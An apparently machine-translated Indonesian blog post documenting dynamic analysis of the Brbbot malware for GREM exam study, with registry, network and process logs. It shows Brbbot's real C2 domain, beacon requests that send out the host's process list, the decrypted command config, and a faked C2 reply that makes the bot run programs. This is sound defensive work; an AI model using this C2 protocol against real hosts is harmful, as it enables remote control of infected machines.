Posting ini dan yang lainnya untuk bulan ini adalah bagian dari seri yang saya gunakan untuk membantu saya mempersiapkan sertifikasi GIAC Reverse Engineer Malware (GREM) saya.
Pada posting sebelumnya, kami melakukan analisis statis Brbbot. Dalam posting ini, kita melihat analisis dinamis, untuk mendapatkan wawasan tentang perilaku program. Ingat, VirusTotal melaporkan bahwa mesin 52/74 melaporkan file ini sebagai berbahaya.
Alat-alat yang digunakan di sini adalah sebagai berikut:
– TShark
– InetSim di Kali
– Monitor Proses – Windows 10
– Peretas Proses – Windows 10
– Proses Explorer – Windows 10
– RegShot – Windows 10
– ProcDot
Mari kita lihat apa yang disediakan alat di atas setelah kami menjalankan brbbot.exe di Windows 10 sebagai administrator.
Melihat dulu RegShot ringkasan perbandingan, kita melihat:
Perhatikan perubahan total tidak semua dari menjalankan brbbot.exe tetapi juga dari program lain yang dijalankan secara sengaja atau tidak sengaja.
Melihat laporan dan memilih beberapa entri yang menarik.
Created with Regshot 1.9.1 x64 Unicode (beta r321) Comments: Datetime: 2020-11-08 20:19:04, 2020-11-08 22:15:15 Computer: SECURITYNIK-WIN, SECURITYNIK-WIN Username: SecurityNik, SecurityNik Values added: ... HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunbrbbot: "C:UsersSecurityNikAppDataRoamingbrbbot.exe" HKUS-1-5-21-3846991316-327138358-508696823-1002SoftwareMicrosoftWindowsCurrentVersionSearchRecentApps{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}AppId: "C:brbbot.exe" HKUS-1-5-21-3846991316-327138358-508696823-1002SoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagsCompatibility AssistantStoreC:brbbot.exe: 53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 00 28 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 DB 80 FD AC 28 39 D3 01 00 00 00 00 00 00 00 00 HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunbrbbot: "C:UsersSecurityNikAppDataRoamingbrbbot.exe" HKUS-1-5-21-3846991316-327138358-508696823-1002SoftwareMicrosoftWindowsCurrentVersionSearchRecentApps{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}AppId: "C:brbbot.exe" ...
Melihat sekilas melalui Process Hacker.
Melihat tab umum
Memuncak ke dalam string dimuat ke dalam memori.
Memuncak ke dalam modul sedang digunakan brbbot.exe.
Melihat ke Menangani.
Transisi ke lalu lintas jaringan seperti yang dilihat dari perspektif Inetsim dan TShark.
$ sudo cat /var/log/inetsim/report/report.18951.txt | more === Report for session '18951' === Real start date : 2020-11-08 17:11:53 Simulated start date : 2020-11-08 17:11:53 Time difference on startup : none ... 2020-11-08 17:12:52 DNS connection, type: A, class: IN, requested name: brb.3dtuts.by 2020-11-08 17:12:52 HTTP connection, method: GET, URL: http://brb.3dtuts.by/ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e6008222 82f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e 233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e6 03f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60 282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e2 33e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d38333428 2f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e3 5283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e 29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232 b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e35 2f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1 f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934 383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b2934383634357 53e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e60 0822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e, f ile name: /var/lib/inetsim/http/fakefiles/sample.html ...
└─$ tshark -r brbbot.pcap -Y "dns.qry.name == brb.3dtuts.by" 15 25.543214256 10.0.0.110 → 10.0.0.114 DNS 73 Standard query 0x6a64 A brb.3dtuts.by 16 25.551623068 10.0.0.114 → 10.0.0.110 DNS 89 Standard query response 0x6a64 A brb.3dtuts.by A 10.0.0.114
Melihat Lalu Lintas HTTP, kami melihat di bawah bahwa saya memiliki banyak koneksi. Melihat lebih dekat pada waktu itu, tampaknya malware menelepon ke rumah (beacon) setiap 30 detik.
└─$ tshark -r brbbot.pcap -Y "http.host == brb.3dtuts.by" -T fields -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.host -E header=y frame.time ip.src tcp.srcport ip.dst tcp.dstport http.host Nov 8, 2020 17:12:52.715732789 EST 10.0.0.110 4081 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:13:22.745066520 EST 10.0.0.110 4082 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:13:52.763137491 EST 10.0.0.110 4084 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:14:22.782289408 EST 10.0.0.110 4086 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:14:52.826690345 EST 10.0.0.110 4087 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:15:22.865526674 EST 10.0.0.110 4088 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:15:52.908439391 EST 10.0.0.110 4089 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:16:22.928449020 EST 10.0.0.110 4090 10.0.0.114 80 brb.3dtuts.by Nov 8, 2020 17:16:52.954382147 EST 10.0.0.110 4092 10.0.0.114 80 brb.3dtuts.by
Melihat ke sesi dengan port sumber sumber 4081 dan port tujuan 80, kita melihat:
└─$ tshark -r brbbot.pcap -q -z follow,tcp,ascii,10.0.0.110:4081,10.0.0.114:80 130 ⨯ =================================================================== Follow: tcp,ascii Filter: ((ip.src eq 10.0.0.110 and tcp.srcport eq 4081) and (ip.dst eq 10.0.0.114 and tcp.dstport eq 80)) or ((ip.src eq 10.0.0.114 and tcp.srcport eq 80) and (ip.dst eq 10.0.0.110 and tcp.dstport eq 4081)) Node 0: 10.0.0.110:4081 Node 1: 10.0.0.114:80 2148 GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) Host: brb.3dtuts.by Connection: Close Cache-Control: no-cache 150 HTTP/1.1 200 OK Connection: Close Content-Type: text/html Date: Sun, 08 Nov 2020 22:12:52 GMT Content-Length: 258 Server: INetSim HTTP Server 258 <html> <head> <title>INetSim default HTML page</title> </head> <body> <p></p> <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p> <p align="center">This file is an HTML document.</p> </body> </html>
Di atas kita melihat halaman INetSim default dikembalikan. Namun, permintaan itu dibuat untuk ads.php. Mungkin kita bisa memanipulasi permintaan ini dengan menambahkan file bernama ads.php. Saya alih-alih beralih ke Apache dan membuat file bernama ads.php ke direktur Apache dan kemudian biarkan brbbot.exe ambil file itu. Itu tampaknya berhasil. Mari kita lihat seperti apa itu. Ini filenya.
└─$ sudo cat /var/www/html/ads.php <HTML> <TITLE>SecurityNik ads.php</TITLE> <BODY> Welcome to SecurityNik World! </BODY> </HTML>
Saat bot membuat permintaan, kami melihat Apache kembali ads.php Melalui 200 pesan sukses.
10.0.0.110 - - [08/Nov/2020:22:24:05 -0500] "GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603d32293e3d3423753e233e60282d383334282f753e233e603a2e3f32343f3c753e233e6039293939342f753e233e HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
Mundur sejenak, kami melihat sistem membuat file brbconfig.tmp. Melihat ke dalam file, kita melihat:
Hal di atas tampaknya tidak membantu sama sekali. Melihat melalui Hexdump
Sekarang setelah kita mengetahui file telah dibuat, mari lompat ke tempat file dibaca, dengan menyetel breakpoint lain, kali ini pada Baca File panggilan. Melihat dokumentasi Microsoft, ia mengatakan argumen pertama untuk Baca File panggilan adalah menangani ke perangkat. Melihat ke bawah, kita melihat pegangannya adalah 0x108 yang dapat ditemukan di register RCX.
Mengkonfirmasi bahwa ini adalah pegangan untuk brbconfig.tmp file, kita sekarang melihat pegangan dari perspektif yang berbeda. Kali ini kita kembali ke SysInternals Handle64.exe.
C:ToolsSysinternalsSuite>handle64.exe -p brbbot.exe Nthandle v4.11 - Handle viewer Copyright (C) 1997-2017 Mark Russinovich Sysinternals - www.sysinternals.com ------------------------------------------------------------------------------ brbbot.exe pid: 4164 SECURITYNIK-WINSecurityNik 108: File (R--) C:GREM-MalwareMalwareday1brbconfig.tmp
Menggulir sampai saya menyukai CryptDecrypt fungsi, saya kemudian mengatur breakpoint pada instruksi secara langsung setelahnya. Ini kemudian memungkinkan saya untuk melihat konten yang didekripsi dari brbconfig.tmp file seperti gambar di bawah ini.
"uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"
Di atas kita melihat ads.php file diminta dengan apa yang tampaknya menjadi perintah untuk dieksekusi dan nilai penyandian 5b.
Mari kita tambahkan nilai untuk eksekutif untuk notepad.exe untuk kami ads.php file untuk melihat apa yang kita dapatkan
─$ sudo bash -c 'echo -e cexe notepad.exe > /var/www/html/ads.php' ─$ sudo cat /var/www/html/ads.php cexe notepad.exe
Berlari brbbot.exe lagi, kita melihat bahwa notepad itu dieksekusi setiap 30 detik.
PS C:UsersSecurityNik> Get-Process *notepad* | Select-Object -Property Name,Id,StartTime,ProcessName | Sort-Object -Property StartTime Name Id StartTime ProcessName ---- -- --------- ----------- notepad 5444 11/9/2020 11:38:58 PM notepad notepad 3528 11/9/2020 11:39:29 PM notepad notepad 3856 11/9/2020 11:39:59 PM notepad notepad 7740 11/9/2020 11:40:29 PM notepad notepad 5376 11/9/2020 11:40:59 PM notepad notepad 6984 11/9/2020 11:41:29 PM notepad notepad 7252 11/9/2020 11:41:59 PM notepad notepad 7748 11/9/2020 11:42:29 PM notepad notepad 7176 11/9/2020 11:42:59 PM notepad notepad 2964 11/9/2020 11:43:29 PM notepad notepad 3640 11/9/2020 11:43:59 PM notepad notepad 2280 11/9/2020 11:44:29 PM notepad notepad 5448 11/9/2020 11:44:59 PM notepad notepad 8184 11/9/2020 11:45:29 PM notepad notepad 2112 11/9/2020 11:45:59 PM notepad notepad 2428 11/9/2020 11:46:29 PM notepad notepad 3368 11/9/2020 11:46:59 PM notepad notepad 5036 11/9/2020 11:47:29 PM notepad notepad 3632 11/9/2020 11:47:59 PM notepad notepad 2608 11/9/2020 11:48:29 PM notepad notepad 6372 11/9/2020 11:48:59 PM notepad notepad 7524 11/9/2020 11:49:29 PM notepad notepad 6780 11/9/2020 11:49:59 PM notepad notepad 248 11/9/2020 11:50:29 PM notepad notepad 7616 11/9/2020 11:50:59 PM notepad notepad 192 11/9/2020 11:51:29 PM notepad
Mengambil pemandangan melalui WMIC, kami melihat:
PS C:UsersSecurityNik> wmic process where "name like '%notepad%'" get name,processID,ParentProcessID Name ParentProcessId ProcessId notepad.exe 1596 5444 notepad.exe 1596 3528 notepad.exe 1596 3856 notepad.exe 1596 7740 notepad.exe 1596 5376 notepad.exe 1596 6984 notepad.exe 1596 7252 notepad.exe 1596 7748 notepad.exe 1596 7176 notepad.exe 1596 2964 notepad.exe 1596 3640 notepad.exe 1596 2280 notepad.exe 1596 5448 notepad.exe 1596 8184 notepad.exe 1596 2112 notepad.exe 1596 2428 notepad.exe 1596 3368 notepad.exe 1596 5036 notepad.exe 1596 3632 notepad.exe 1596 2608 notepad.exe 1596 6372 notepad.exe 1596 7524 notepad.exe 1596 6780 notepad.exe 1596 248 notepad.exe 1596 7616 notepad.exe 1596 192 notepad.exe 1596 672
PS C:UsersSecurityNik> wmic process where processid="1596" get name,processID,parentProcessID Name ParentProcessId ProcessId brbbot.exe 4476 1596
Langkah terakhir sekarang adalah memecahkan kode lalu lintas dari permintaan HTTP di dalam P parameter di atas. Kami melihat di ads.php mengajukan nilai enkode = 5b. 5b ini digunakan untuk mengkodekan nilai-nilai dalam Hex P parameter. Saya menyalin nilai-nilai di P parameter ke file bernama p-parameter.txt dengan semuanya dalam satu baris. Berikut adalah apa yang terlihat seperti.
└─$ cat p-parameter.txt 123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e603f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e35283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e352f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b293438363435753e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e600822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e
xxd digunakan di sebelah untuk mengembalikan nilai hex di atas ke biner mentah seperti yang ditunjukkan di bawah ini:
└─$ xxd -revert -plain p-parameter.txt > p-parameter.raw
Berkas p-parameter.raw seperti.
└─$ cat p-parameter.raw ?7>"(/>6`(6((u>#>`8()((u>#>`,25252/u>#>`8()((u>#>`,2574<45u>#>`(>)-28>(u>#>`7(:((u>#>`(-834(/u>#>`=45/?)-34(/u>#>`=45/?4>)-28>u>#>`>64)"{▒46+)>((245`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(+447(-u>#>`(-834(/u>#>"(645u>#>`(+7.50?u>#>>8.)2/">:7/>)-28>u>#>`(-834(/u>#>`.5(>8:++u>#>`84534(/u>#>`(+7.50v,25>-/74<u>#>`(-834(/u>#>>:)835?>#>)u>#>`(-834(/u>#>`(234(/u>#>`(-834(/u>#>`/:(034(/,u>#>`8/=645u>#>`>#+74)>)u>#>3>77#+>)2>58>4(/u>#>>:)83u>#>` .5/26>)4#):"u>#>`5>)2->u>#>`>7+0>)u>#>0"+>:80<)4.5?4(/u>#>▒.2u>#>` :5>u>#>`▒++728:/245):6>4(/u>#>` )48>((:80>)u>#>`+)48>#+mou>#>` .5/26>)40>)u>#>`?7734(/u>#>`86?u>#>`84534(/u>#>` )48645u>#>` )48645mou>#>` ><(34/v#mov5284?>u>#>`(-834(/u>#>` 2)>(3:)0u>#>"(/>>//25<(u>#>`/:(034(/,u>#>`?7734(/u>#>`?7734(/u>#>`9)994/u>#>
Untuk memecahkan kode p-parameter.raw file, saya meneruskannya sebagai input ke CyberChef.
Setelah decoding, kami melihat bahwa bersama dengan alamat IP dan nama komputer, brbbot.exe juga mengekstrak informasi tentang proses yang sedang berjalan di host.
Itu saja untuk posting ini karena saya yakin saya mencapai pembelajaran yang saya perlukan untuk malware ini.
PS Tidak yakin apakah Anda menyadarinya. Namun, saya harus menjalankan brbbot.exe beberapa kali dan dengan demikian Anda mungkin telah memperhatikan bahwa PID berubah, dll. Konsepnya masih tetap sama.